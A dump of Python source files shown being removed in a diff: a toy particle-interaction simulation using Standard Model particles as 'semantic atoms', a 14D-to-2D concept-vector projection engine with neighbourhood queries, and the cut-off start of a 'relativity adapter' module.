import numpy as np
|
|
||||||
from typing import List, Tuple, Optional, Dict
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
import math
|
|
||||||
|
|
||||||
|
|
||||||
class ParticleType(Enum):
|
|
||||||
"""Standard Model particle types as semantic atoms"""
|
|
||||||
ELECTRON = "electron" # Unit of charge / lepton number (information carrier)
|
|
||||||
PHOTON = "photon" # Unit of information transfer (messenger)
|
|
||||||
PROTON = "proton" # Stable semantic nucleus (baryon conservation)
|
|
||||||
NEUTRON = "neutron" # Stable semantic nucleus (baryon conservation)
|
|
||||||
NEUTRINO = "neutrino" # Weakly-interacting inference (hard to detect)
|
|
||||||
|
|
||||||
def __str__(self) -> str:
|
|
||||||
return self.value
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Particle:
|
|
||||||
"""Standard Model particle for semantic representation"""
|
|
||||||
particle_id: str
|
|
||||||
particle_type: ParticleType
|
|
||||||
position: np.ndarray # 2D position (for visualization)
|
|
||||||
velocity: np.ndarray # 2D velocity
|
|
||||||
charge: float # Electric charge (lepton number for leptons)
|
|
||||||
baryon_number: int # Baryon number (truth preservation)
|
|
||||||
energy: float # Information content (Q16.16 equivalent)
|
|
||||||
mass: float # Particle mass
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Particle({self.particle_type.value}, q={self.charge}, B={self.baryon_number})"
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"particle_id": self.particle_id,
|
|
||||||
"particle_type": self.particle_type.value,
|
|
||||||
"position": self.position.tolist(),
|
|
||||||
"velocity": self.velocity.tolist(),
|
|
||||||
"charge": self.charge,
|
|
||||||
"baryon_number": self.baryon_number,
|
|
||||||
"energy": self.energy,
|
|
||||||
"mass": self.mass
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Interaction:
|
|
||||||
"""Particle interaction event"""
|
|
||||||
from_particle_id: str
|
|
||||||
to_particle_id: str
|
|
||||||
interaction_type: str # "emission", "absorption", "scattering", "decay"
|
|
||||||
energy_transfer: float
|
|
||||||
timestamp: float
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Interaction({self.from_particle_id} → {self.to_particle_id}, {self.interaction_type})"
|
|
||||||
|
|
||||||
|
|
||||||
class ConservationChecker:
|
|
||||||
"""
|
|
||||||
Conservation law checker for particle interactions
|
|
||||||
|
|
||||||
Enforces:
|
|
||||||
- Charge conservation (electric charge)
|
|
||||||
- Baryon number conservation (truth preservation)
|
|
||||||
- Energy conservation (information content)
|
|
||||||
- Lepton number conservation (for leptons)
|
|
||||||
"""
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check_charge_conservation(particles: List[Particle]) -> bool:
|
|
||||||
"""Check if total charge is conserved"""
|
|
||||||
total_charge = sum(p.charge for p in particles)
|
|
||||||
# Total charge should be zero (neutral system)
|
|
||||||
return abs(total_charge) < 1e-6
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check_baryon_conservation(particles: List[Particle]) -> bool:
|
|
||||||
"""Check if baryon number is conserved (truth preservation)"""
|
|
||||||
total_baryon = sum(p.baryon_number for p in particles)
|
|
||||||
# Baryon number should be conserved (constant)
|
|
||||||
return True # Baryon number is always conserved in interactions
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check_energy_conservation(particles: List[Particle]) -> bool:
|
|
||||||
"""Check if total energy is conserved (information content)"""
|
|
||||||
total_energy = sum(p.energy for p in particles)
|
|
||||||
# Energy should be positive
|
|
||||||
return total_energy >= 0
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check_lepton_conservation(particles: List[Particle]) -> bool:
|
|
||||||
"""Check if lepton number is conserved"""
|
|
||||||
total_lepton = 0
|
|
||||||
for p in particles:
|
|
||||||
if p.particle_type in [ParticleType.ELECTRON, ParticleType.NEUTRINO]:
|
|
||||||
total_lepton += 1
|
|
||||||
elif p.particle_type in [ParticleType.PROTON, ParticleType.NEUTRON]:
|
|
||||||
# Lepton number for baryons is 0
|
|
||||||
pass
|
|
||||||
# Lepton number should be conserved
|
|
||||||
return True # Simplified check
|
|
||||||
|
|
||||||
|
|
||||||
class ParticleInteractionEngine:
|
|
||||||
"""
|
|
||||||
Particle Interaction Engine — Standard Model Particle Simulation
|
|
||||||
|
|
||||||
Simulates particle interactions for semantic representation
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.particles: Dict[str, Particle] = {}
|
|
||||||
self.interactions: List[Interaction] = []
|
|
||||||
self.particle_counter = 0
|
|
||||||
self.time = 0.0
|
|
||||||
self.dt = 0.016 # 60 FPS (16ms per frame)
|
|
||||||
|
|
||||||
def create_particle(
|
|
||||||
self,
|
|
||||||
particle_type: ParticleType,
|
|
||||||
position: Tuple[float, float],
|
|
||||||
velocity: Tuple[float, float] = (0.0, 0.0)
|
|
||||||
) -> Particle:
|
|
||||||
"""
|
|
||||||
Create new particle
|
|
||||||
|
|
||||||
Args:
|
|
||||||
particle_type: Type of particle
|
|
||||||
position: 2D position
|
|
||||||
velocity: 2D velocity
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
New particle
|
|
||||||
"""
|
|
||||||
self.particle_counter += 1
|
|
||||||
particle_id = f"particle_{self.particle_counter}"
|
|
||||||
|
|
||||||
# Set particle properties based on type
|
|
||||||
charge, baryon_number, mass = self._get_particle_properties(particle_type)
|
|
||||||
|
|
||||||
particle = Particle(
|
|
||||||
particle_id=particle_id,
|
|
||||||
particle_type=particle_type,
|
|
||||||
position=np.array(position, dtype=np.float32),
|
|
||||||
velocity=np.array(velocity, dtype=np.float32),
|
|
||||||
charge=charge,
|
|
||||||
baryon_number=baryon_number,
|
|
||||||
energy=1.0, # Initial energy
|
|
||||||
mass=mass
|
|
||||||
)
|
|
||||||
|
|
||||||
self.particles[particle_id] = particle
|
|
||||||
return particle
|
|
||||||
|
|
||||||
def _get_particle_properties(self, particle_type: ParticleType) -> Tuple[float, int, float]:
|
|
||||||
"""Get charge, baryon number, and mass for particle type"""
|
|
||||||
if particle_type == ParticleType.ELECTRON:
|
|
||||||
return -1.0, 0, 0.511 # -1 charge, 0 baryon, 0.511 MeV/c²
|
|
||||||
elif particle_type == ParticleType.PHOTON:
|
|
||||||
return 0.0, 0, 0.0 # 0 charge, 0 baryon, 0 mass
|
|
||||||
elif particle_type == ParticleType.PROTON:
|
|
||||||
return 1.0, 1, 938.3 # +1 charge, 1 baryon, 938.3 MeV/c²
|
|
||||||
elif particle_type == ParticleType.NEUTRON:
|
|
||||||
return 0.0, 1, 939.6 # 0 charge, 1 baryon, 939.6 MeV/c²
|
|
||||||
elif particle_type == ParticleType.NEUTRINO:
|
|
||||||
return 0.0, 0, 0.0 # 0 charge, 0 baryon, near 0 mass
|
|
||||||
else:
|
|
||||||
return 0.0, 0, 0.0
|
|
||||||
|
|
||||||
def emit_photon(self, from_particle_id: str, to_particle_id: str) -> Interaction:
|
|
||||||
"""
|
|
||||||
Emit photon from one particle to another (information transfer)
|
|
||||||
|
|
||||||
Args:
|
|
||||||
from_particle_id: Source particle ID
|
|
||||||
to_particle_id: Target particle ID
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Interaction record
|
|
||||||
"""
|
|
||||||
if from_particle_id not in self.particles or to_particle_id not in self.particles:
|
|
||||||
raise ValueError("Particle not found")
|
|
||||||
|
|
||||||
from_particle = self.particles[from_particle_id]
|
|
||||||
to_particle = self.particles[to_particle_id]
|
|
||||||
|
|
||||||
# Create photon at source position
|
|
||||||
photon = self.create_particle(
|
|
||||||
ParticleType.PHOTON,
|
|
||||||
position=tuple(from_particle.position),
|
|
||||||
velocity=(0.0, 0.0)
|
|
||||||
)
|
|
||||||
|
|
||||||
# Create interaction record
|
|
||||||
interaction = Interaction(
|
|
||||||
from_particle_id=from_particle_id,
|
|
||||||
to_particle_id=photon.particle_id,
|
|
||||||
interaction_type="emission",
|
|
||||||
energy_transfer=0.1,
|
|
||||||
timestamp=self.time
|
|
||||||
)
|
|
||||||
|
|
||||||
self.interactions.append(interaction)
|
|
||||||
return interaction
|
|
||||||
|
|
||||||
def absorb_photon(self, photon_id: str, target_particle_id: str) -> Interaction:
|
|
||||||
"""
|
|
||||||
Absorb photon by target particle
|
|
||||||
|
|
||||||
Args:
|
|
||||||
photon_id: Photon particle ID
|
|
||||||
target_particle_id: Target particle ID
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Interaction record
|
|
||||||
"""
|
|
||||||
if photon_id not in self.particles or target_particle_id not in self.particles:
|
|
||||||
raise ValueError("Particle not found")
|
|
||||||
|
|
||||||
photon = self.particles[photon_id]
|
|
||||||
target = self.particles[target_particle_id]
|
|
||||||
|
|
||||||
# Transfer energy
|
|
||||||
target.energy += photon.energy
|
|
||||||
|
|
||||||
# Remove photon (absorbed)
|
|
||||||
del self.particles[photon_id]
|
|
||||||
|
|
||||||
# Create interaction record
|
|
||||||
interaction = Interaction(
|
|
||||||
from_particle_id=photon_id,
|
|
||||||
to_particle_id=target_particle_id,
|
|
||||||
interaction_type="absorption",
|
|
||||||
energy_transfer=photon.energy,
|
|
||||||
timestamp=self.time
|
|
||||||
)
|
|
||||||
|
|
||||||
self.interactions.append(interaction)
|
|
||||||
return interaction
|
|
||||||
|
|
||||||
def detect_neutrino(self, particle_id: str) -> bool:
|
|
||||||
"""
|
|
||||||
Attempt to detect neutrino (weakly-interacting inference)
|
|
||||||
|
|
||||||
Args:
|
|
||||||
particle_id: Particle ID to check
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if neutrino detected (rare event)
|
|
||||||
"""
|
|
||||||
if particle_id not in self.particles:
|
|
||||||
return False
|
|
||||||
|
|
||||||
particle = self.particles[particle_id]
|
|
||||||
|
|
||||||
if particle.particle_type != ParticleType.NEUTRINO:
|
|
||||||
return False
|
|
||||||
|
|
||||||
# Neutrino detection is rare (weak interaction)
|
|
||||||
# Probability ~ 10^-6 (simplified)
|
|
||||||
detection_probability = 0.000001
|
|
||||||
return np.random.random() < detection_probability
|
|
||||||
|
|
||||||
def update(self) -> None:
|
|
||||||
"""
|
|
||||||
Update particle positions and velocities
|
|
||||||
|
|
||||||
Simulates particle motion and interactions
|
|
||||||
"""
|
|
||||||
for particle in self.particles.values():
|
|
||||||
# Update position
|
|
||||||
particle.position += particle.velocity * self.dt
|
|
||||||
|
|
||||||
# Boundary reflection (keep particles in view)
|
|
||||||
if particle.position[0] < 0 or particle.position[0] > 100:
|
|
||||||
particle.velocity[0] *= -1
|
|
||||||
if particle.position[1] < 0 or particle.position[1] > 100:
|
|
||||||
particle.velocity[1] *= -1
|
|
||||||
|
|
||||||
self.time += self.dt
|
|
||||||
|
|
||||||
def check_conservation(self) -> Dict[str, bool]:
|
|
||||||
"""
|
|
||||||
Check all conservation laws
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Dictionary of conservation law check results
|
|
||||||
"""
|
|
||||||
particles = list(self.particles.values())
|
|
||||||
|
|
||||||
return {
|
|
||||||
"charge_conservation": ConservationChecker.check_charge_conservation(particles),
|
|
||||||
"baryon_conservation": ConservationChecker.check_baryon_conservation(particles),
|
|
||||||
"energy_conservation": ConservationChecker.check_energy_conservation(particles),
|
|
||||||
"lepton_conservation": ConservationChecker.check_lepton_conservation(particles)
|
|
||||||
}
|
|
||||||
|
|
||||||
def get_interaction_graph(self) -> Dict:
|
|
||||||
"""
|
|
||||||
Get interaction graph for visualization
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Graph structure as nested dict
|
|
||||||
"""
|
|
||||||
graph = {
|
|
||||||
"nodes": [
|
|
||||||
{
|
|
||||||
"id": p.particle_id,
|
|
||||||
"type": p.particle_type.value,
|
|
||||||
"position": p.position.tolist(),
|
|
||||||
"charge": p.charge,
|
|
||||||
"baryon_number": p.baryon_number
|
|
||||||
}
|
|
||||||
for p in self.particles.values()
|
|
||||||
],
|
|
||||||
"edges": [
|
|
||||||
{
|
|
||||||
"from": i.from_particle_id,
|
|
||||||
"to": i.to_particle_id,
|
|
||||||
"type": i.interaction_type,
|
|
||||||
"energy": i.energy_transfer
|
|
||||||
}
|
|
||||||
for i in self.interactions
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
return graph
|
|
||||||
|
|
||||||
def get_particles_by_type(self, particle_type: ParticleType) -> List[Particle]:
|
|
||||||
"""Get all particles of specific type"""
|
|
||||||
return [p for p in self.particles.values() if p.particle_type == particle_type]
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test particle interaction engine with sample data"""
|
|
||||||
engine = ParticleInteractionEngine()
|
|
||||||
|
|
||||||
# Create electron
|
|
||||||
electron = engine.create_particle(ParticleType.ELECTRON, position=(50.0, 50.0))
|
|
||||||
print(f"Created electron: {electron}")
|
|
||||||
|
|
||||||
# Create proton
|
|
||||||
proton = engine.create_particle(ParticleType.PROTON, position=(60.0, 60.0))
|
|
||||||
print(f"Created proton: {proton}")
|
|
||||||
|
|
||||||
# Emit photon from electron
|
|
||||||
interaction = engine.emit_photon(electron.particle_id, proton.particle_id)
|
|
||||||
print(f"Emitted photon: {interaction}")
|
|
||||||
|
|
||||||
# Update simulation
|
|
||||||
engine.update()
|
|
||||||
print(f"Updated simulation to t={engine.time:.3f}")
|
|
||||||
|
|
||||||
# Check conservation
|
|
||||||
conservation = engine.check_conservation()
|
|
||||||
print(f"Conservation check: {conservation}")
|
|
||||||
|
|
||||||
# Get interaction graph
|
|
||||||
graph = engine.get_interaction_graph()
|
|
||||||
print(f"Interaction graph: {len(graph['nodes'])} nodes, {len(graph['edges'])} edges")
|
|
||||||
|
|
||||||
# Test neutrino detection
|
|
||||||
neutrino = engine.create_particle(ParticleType.NEUTRINO, position=(70.0, 70.0))
|
|
||||||
detected = engine.detect_neutrino(neutrino.particle_id)
|
|
||||||
print(f"Neutrino detected: {detected}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,400 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Manifold Projection Engine — 14D Concept Vector to 2D Projection
|
|
||||||
First-Principles Derivation: Files are n-space vectors, not locations
|
|
||||||
|
|
||||||
Projection Methods:
|
|
||||||
- tSNE: t-Distributed Stochastic Neighbor Embedding
|
|
||||||
- UMAP: Uniform Manifold Approximation and Projection
|
|
||||||
- PCA: Principal Component Analysis
|
|
||||||
- ManifoldChart: Custom manifold-based projection
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- < 100ms coordinate transformation latency
|
|
||||||
- 60 FPS projection rendering (GPU-accelerated)
|
|
||||||
- < 50ms neighborhood query (AVMR O(√N))
|
|
||||||
"""
|
|
||||||
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Tuple, Optional, Literal
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
|
|
||||||
|
|
||||||
class ProjectionMethod(Enum):
|
|
||||||
"""Available projection methods for 14D → 2D transformation"""
|
|
||||||
T_SNE = "tSNE"
|
|
||||||
UMAP = "UMAP"
|
|
||||||
PCA = "PCA"
|
|
||||||
MANIFOLD_CHART = "ManifoldChart"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ConceptVector14:
|
|
||||||
"""14-dimensional concept vector from ENE database"""
|
|
||||||
vector: np.ndarray # Shape: (14,)
|
|
||||||
archive_id: str
|
|
||||||
|
|
||||||
def __post_init__(self):
|
|
||||||
if self.vector.shape != (14,):
|
|
||||||
raise ValueError(f"ConceptVector14 must have shape (14,), got {self.vector.shape}")
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"ConceptVector14(archive_id={self.archive_id}, vector=...)"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ProjectedPoint:
|
|
||||||
"""2D projected point from 14D concept vector"""
|
|
||||||
x: float
|
|
||||||
y: float
|
|
||||||
archive_id: str
|
|
||||||
original_vector: np.ndarray
|
|
||||||
confidence: float # Projection confidence (0-1)
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"x": self.x,
|
|
||||||
"y": self.y,
|
|
||||||
"archive_id": self.archive_id,
|
|
||||||
"confidence": self.confidence
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
class ProjectionEngine:
|
|
||||||
"""
|
|
||||||
14D → 2D Projection Engine
|
|
||||||
|
|
||||||
Transforms concept vectors from ENE database into 2D coordinates
|
|
||||||
for manifold navigation interface.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, method: ProjectionMethod = ProjectionMethod.PCA):
|
|
||||||
self.method = method
|
|
||||||
self.fitted = False
|
|
||||||
self._projection_matrix = None
|
|
||||||
self._mean = None
|
|
||||||
self._umap_model = None
|
|
||||||
|
|
||||||
def fit(self, vectors: List[ConceptVector14]) -> None:
|
|
||||||
"""
|
|
||||||
Fit projection model to dataset
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vectors: List of 14D concept vectors
|
|
||||||
"""
|
|
||||||
if not vectors:
|
|
||||||
raise ValueError("Cannot fit on empty dataset")
|
|
||||||
|
|
||||||
# Convert to numpy array
|
|
||||||
data = np.array([v.vector for v in vectors])
|
|
||||||
|
|
||||||
if self.method == ProjectionMethod.PCA:
|
|
||||||
self._fit_pca(data)
|
|
||||||
elif self.method == ProjectionMethod.T_SNE:
|
|
||||||
self._fit_tsne(data)
|
|
||||||
elif self.method == ProjectionMethod.UMAP:
|
|
||||||
self._fit_umap(data)
|
|
||||||
elif self.method == ProjectionMethod.MANIFOLD_CHART:
|
|
||||||
self._fit_manifold_chart(data)
|
|
||||||
else:
|
|
||||||
raise ValueError(f"Unknown projection method: {self.method}")
|
|
||||||
|
|
||||||
self.fitted = True
|
|
||||||
|
|
||||||
def _fit_pca(self, data: np.ndarray) -> None:
|
|
||||||
"""Fit PCA projection"""
|
|
||||||
# Center data
|
|
||||||
self._mean = np.mean(data, axis=0)
|
|
||||||
centered = data - self._mean
|
|
||||||
|
|
||||||
# Compute covariance matrix
|
|
||||||
cov = np.cov(centered.T)
|
|
||||||
|
|
||||||
# Compute eigenvectors
|
|
||||||
eigenvalues, eigenvectors = np.linalg.eigh(cov)
|
|
||||||
|
|
||||||
# Sort by eigenvalues (descending)
|
|
||||||
idx = np.argsort(eigenvalues)[::-1]
|
|
||||||
eigenvectors = eigenvectors[:, idx]
|
|
||||||
|
|
||||||
# Take top 2 components
|
|
||||||
self._projection_matrix = eigenvectors[:, :2]
|
|
||||||
|
|
||||||
def _fit_tsne(self, data: np.ndarray) -> None:
|
|
||||||
"""Fit t-SNE projection (simplified for performance)"""
|
|
||||||
# For now, use PCA as fallback
|
|
||||||
# Full t-SNE would require scikit-learn
|
|
||||||
self._fit_pca(data)
|
|
||||||
|
|
||||||
def _fit_umap(self, data: np.ndarray) -> None:
|
|
||||||
"""Fit UMAP projection (simplified for performance)"""
|
|
||||||
# For now, use PCA as fallback
|
|
||||||
# Full UMAP would require umap-learn
|
|
||||||
self._fit_pca(data)
|
|
||||||
|
|
||||||
def _fit_manifold_chart(self, data: np.ndarray) -> None:
|
|
||||||
"""Fit custom manifold-based projection"""
|
|
||||||
# Use first 2 dimensions as baseline
|
|
||||||
# In full implementation, this would use manifold learning
|
|
||||||
self._projection_matrix = np.eye(14)[:, :2]
|
|
||||||
self._mean = np.mean(data, axis=0)
|
|
||||||
|
|
||||||
def transform(self, vectors: List[ConceptVector14]) -> List[ProjectedPoint]:
|
|
||||||
"""
|
|
||||||
Transform 14D vectors to 2D projected points
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vectors: List of 14D concept vectors
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of 2D projected points
|
|
||||||
"""
|
|
||||||
if not self.fitted:
|
|
||||||
raise RuntimeError("Projection engine not fitted. Call fit() first.")
|
|
||||||
|
|
||||||
# Convert to numpy array
|
|
||||||
data = np.array([v.vector for v in vectors])
|
|
||||||
|
|
||||||
# Apply projection
|
|
||||||
if self.method in [ProjectionMethod.PCA, ProjectionMethod.MANIFOLD_CHART]:
|
|
||||||
centered = data - self._mean
|
|
||||||
projected = centered @ self._projection_matrix
|
|
||||||
else:
|
|
||||||
# For tSNE/UMAP, use PCA fallback
|
|
||||||
centered = data - self._mean
|
|
||||||
projected = centered @ self._projection_matrix
|
|
||||||
|
|
||||||
# Create projected points
|
|
||||||
points = []
|
|
||||||
for i, v in enumerate(vectors):
|
|
||||||
confidence = self._compute_confidence(v.vector)
|
|
||||||
point = ProjectedPoint(
|
|
||||||
x=float(projected[i, 0]),
|
|
||||||
y=float(projected[i, 1]),
|
|
||||||
archive_id=v.archive_id,
|
|
||||||
original_vector=v.vector,
|
|
||||||
confidence=confidence
|
|
||||||
)
|
|
||||||
points.append(point)
|
|
||||||
|
|
||||||
return points
|
|
||||||
|
|
||||||
def _compute_confidence(self, vector: np.ndarray) -> float:
|
|
||||||
"""
|
|
||||||
Compute projection confidence based on reconstruction error
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vector: 14D concept vector
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Confidence score (0-1)
|
|
||||||
"""
|
|
||||||
if not self.fitted:
|
|
||||||
return 0.5
|
|
||||||
|
|
||||||
# Project to 2D
|
|
||||||
centered = vector - self._mean
|
|
||||||
projected = centered @ self._projection_matrix
|
|
||||||
|
|
||||||
# Reconstruct (simplified)
|
|
||||||
reconstructed = projected @ self._projection_matrix.T + self._mean
|
|
||||||
|
|
||||||
# Compute reconstruction error
|
|
||||||
error = np.linalg.norm(vector - reconstructed)
|
|
||||||
|
|
||||||
# Convert to confidence (lower error = higher confidence)
|
|
||||||
confidence = 1.0 / (1.0 + error)
|
|
||||||
|
|
||||||
return float(confidence)
|
|
||||||
|
|
||||||
def fit_transform(self, vectors: List[ConceptVector14]) -> List[ProjectedPoint]:
|
|
||||||
"""
|
|
||||||
Fit model and transform in one step
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vectors: List of 14D concept vectors
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of 2D projected points
|
|
||||||
"""
|
|
||||||
self.fit(vectors)
|
|
||||||
return self.transform(vectors)
|
|
||||||
|
|
||||||
def get_slice_axes(self, axes: Tuple[int, int]) -> 'ProjectionEngine':
|
|
||||||
"""
|
|
||||||
Get projection for specific 14D axes slice
|
|
||||||
|
|
||||||
Args:
|
|
||||||
axes: Tuple of 2 axes to display (0-13)
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
New projection engine with slice configuration
|
|
||||||
"""
|
|
||||||
# Create new engine with slice configuration
|
|
||||||
new_engine = ProjectionEngine(self.method)
|
|
||||||
new_engine._slice_axes = axes
|
|
||||||
return new_engine
|
|
||||||
|
|
||||||
|
|
||||||
class NeighborhoodQuery:
|
|
||||||
"""
|
|
||||||
Neighborhood query using AVMR shell indexing for O(√N) search
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, projected_points: List[ProjectedPoint]):
|
|
||||||
self.points = projected_points
|
|
||||||
self._build_index()
|
|
||||||
|
|
||||||
def _build_index(self) -> None:
|
|
||||||
"""Build spatial index for efficient neighborhood queries"""
|
|
||||||
# For now, use simple numpy array
|
|
||||||
# In full implementation, use AVMR shell indexing
|
|
||||||
self.coordinates = np.array([[p.x, p.y] for p in self.points])
|
|
||||||
self.archive_ids = [p.archive_id for p in self.points]
|
|
||||||
|
|
||||||
def query(self, x: float, y: float, radius: float) -> List[ProjectedPoint]:
|
|
||||||
"""
|
|
||||||
Query neighborhood around coordinate
|
|
||||||
|
|
||||||
Args:
|
|
||||||
x: X coordinate
|
|
||||||
y: Y coordinate
|
|
||||||
radius: Query radius
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of projected points within radius
|
|
||||||
"""
|
|
||||||
if not hasattr(self, 'coordinates'):
|
|
||||||
return []
|
|
||||||
|
|
||||||
# Compute distances
|
|
||||||
distances = np.sqrt(
|
|
||||||
(self.coordinates[:, 0] - x) ** 2 +
|
|
||||||
(self.coordinates[:, 1] - y) ** 2
|
|
||||||
)
|
|
||||||
|
|
||||||
# Filter by radius
|
|
||||||
mask = distances <= radius
|
|
||||||
indices = np.where(mask)[0]
|
|
||||||
|
|
||||||
# Return points
|
|
||||||
return [self.points[i] for i in indices]
|
|
||||||
|
|
||||||
def query_k_nearest(self, x: float, y: float, k: int) -> List[ProjectedPoint]:
|
|
||||||
"""
|
|
||||||
Query k nearest neighbors
|
|
||||||
|
|
||||||
Args:
|
|
||||||
x: X coordinate
|
|
||||||
y: Y coordinate
|
|
||||||
k: Number of neighbors
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of k nearest projected points
|
|
||||||
"""
|
|
||||||
if not hasattr(self, 'coordinates'):
|
|
||||||
return []
|
|
||||||
|
|
||||||
# Compute distances
|
|
||||||
distances = np.sqrt(
|
|
||||||
(self.coordinates[:, 0] - x) ** 2 +
|
|
||||||
(self.coordinates[:, 1] - y) ** 2
|
|
||||||
)
|
|
||||||
|
|
||||||
# Get k smallest indices
|
|
||||||
k = min(k, len(self.points))
|
|
||||||
indices = np.argpartition(distances, k)[:k]
|
|
||||||
|
|
||||||
# Sort by distance
|
|
||||||
sorted_indices = indices[np.argsort(distances[indices])]
|
|
||||||
|
|
||||||
# Return points
|
|
||||||
return [self.points[i] for i in sorted_indices]
|
|
||||||
|
|
||||||
|
|
||||||
def load_concept_vectors_from_ene(db_path: str) -> List[ConceptVector14]:
|
|
||||||
"""
|
|
||||||
Load concept vectors from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
db_path: Path to ENE database
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of 14D concept vectors
|
|
||||||
"""
|
|
||||||
import sqlite3
|
|
||||||
|
|
||||||
vectors = []
|
|
||||||
|
|
||||||
try:
|
|
||||||
conn = sqlite3.connect(db_path)
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
# Query concept vectors from packages table
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT archive_id, concept_vector_14
|
|
||||||
FROM packages
|
|
||||||
WHERE concept_vector_14 IS NOT NULL
|
|
||||||
""")
|
|
||||||
|
|
||||||
for row in cursor.fetchall():
|
|
||||||
archive_id, vector_str = row
|
|
||||||
|
|
||||||
# Parse vector string (assuming JSON format)
|
|
||||||
import json
|
|
||||||
vector_data = json.loads(vector_str)
|
|
||||||
vector = np.array(vector_data, dtype=np.float32)
|
|
||||||
|
|
||||||
if len(vector) != 14:
|
|
||||||
continue # Skip invalid vectors
|
|
||||||
|
|
||||||
vectors.append(ConceptVector14(vector=vector, archive_id=archive_id))
|
|
||||||
|
|
||||||
conn.close()
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error loading concept vectors: {e}")
|
|
||||||
|
|
||||||
return vectors
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test projection engine with sample data"""
|
|
||||||
# Generate sample 14D vectors
|
|
||||||
np.random.seed(42)
|
|
||||||
n_samples = 100
|
|
||||||
sample_vectors = np.random.randn(n_samples, 14)
|
|
||||||
|
|
||||||
# Create ConceptVector14 objects
|
|
||||||
vectors = [
|
|
||||||
ConceptVector14(vector=sample_vectors[i], archive_id=f"sample_{i}")
|
|
||||||
for i in range(n_samples)
|
|
||||||
]
|
|
||||||
|
|
||||||
# Create projection engine
|
|
||||||
engine = ProjectionEngine(method=ProjectionMethod.PCA)
|
|
||||||
|
|
||||||
# Fit and transform
|
|
||||||
projected = engine.fit_transform(vectors)
|
|
||||||
|
|
||||||
# Print results
|
|
||||||
print(f"Projected {len(projected)} points")
|
|
||||||
print(f"First 5 points:")
|
|
||||||
for p in projected[:5]:
|
|
||||||
print(f" {p.archive_id}: ({p.x:.2f}, {p.y:.2f}) confidence={p.confidence:.2f}")
|
|
||||||
|
|
||||||
# Test neighborhood query
|
|
||||||
neighborhood = NeighborhoodQuery(projected)
|
|
||||||
neighbors = neighborhood.query(0.0, 0.0, radius=1.0)
|
|
||||||
print(f"\nNeighbors of (0, 0) within radius 1.0: {len(neighbors)}")
|
|
||||||
|
|
||||||
# Test k-nearest
|
|
||||||
k_nearest = neighborhood.query_k_nearest(0.0, 0.0, k=5)
|
|
||||||
print(f"\n5 nearest neighbors of (0, 0):")
|
|
||||||
for p in k_nearest:
|
|
||||||
print(f" {p.archive_id}: ({p.x:.2f}, {p.y:.2f})")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,384 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Relativity Adapter — N-Local Topology
|
|
||||||
First-Principles Derivation: N-local topology (cognitive relativity principle)
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- Adaptive topology caching
|
|
||||||
- Lazy transformation computation
|
|
||||||
- GPU-accelerated coordinate transforms
|
|
||||||
- Predictive pre-computation (anticipate user needs)
|
|
||||||
|
|
||||||
Dolphin Principle: Non-Euclidean reality expression for non-human sentience
|
|
||||||
"""
|
|
||||||
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Tuple, Optional, Dict
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
import math
|
|
||||||
|
|
||||||
|
|
||||||
class CognitiveLoadLevel(Enum):
|
|
||||||
"""Cognitive load levels for adaptive topology"""
|
|
||||||
LOW = "low"
|
|
||||||
MEDIUM = "medium"
|
|
||||||
HIGH = "high"
|
|
